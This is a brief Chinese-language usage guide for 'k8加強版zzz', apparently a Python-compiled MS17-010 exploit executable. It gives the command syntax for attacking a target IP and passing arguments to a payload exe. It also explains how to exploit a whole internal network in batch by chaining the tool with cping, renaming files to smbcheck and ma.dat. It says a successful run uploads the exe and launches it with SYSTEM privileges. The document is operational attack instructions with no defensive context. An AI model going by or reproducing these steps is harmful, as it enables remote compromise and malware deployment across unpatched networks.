工具:k8加強版zzz
編譯:python
漏洞:MS17-010
用法:
zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 exe參數
zzz_exploit.exe 192.11.22.82 exe參數 管道名
如exe啟動參數為 m.exe -Start 實戰命令為 zzz_exploit.exe 192.11.22.82 -Start
內網批量
可結合cping批量溢出內網,將名稱改為smbcheck即可,但exe必須使用無參版。(其它工具也可以,提供個IP參數即可)
因為cping只會傳IP進去,不會傳其它參數。使用前需將任意exe改名為ma.dat
溢出成功會自動將exe傳入目標機器,並以system權限啟動exe程序。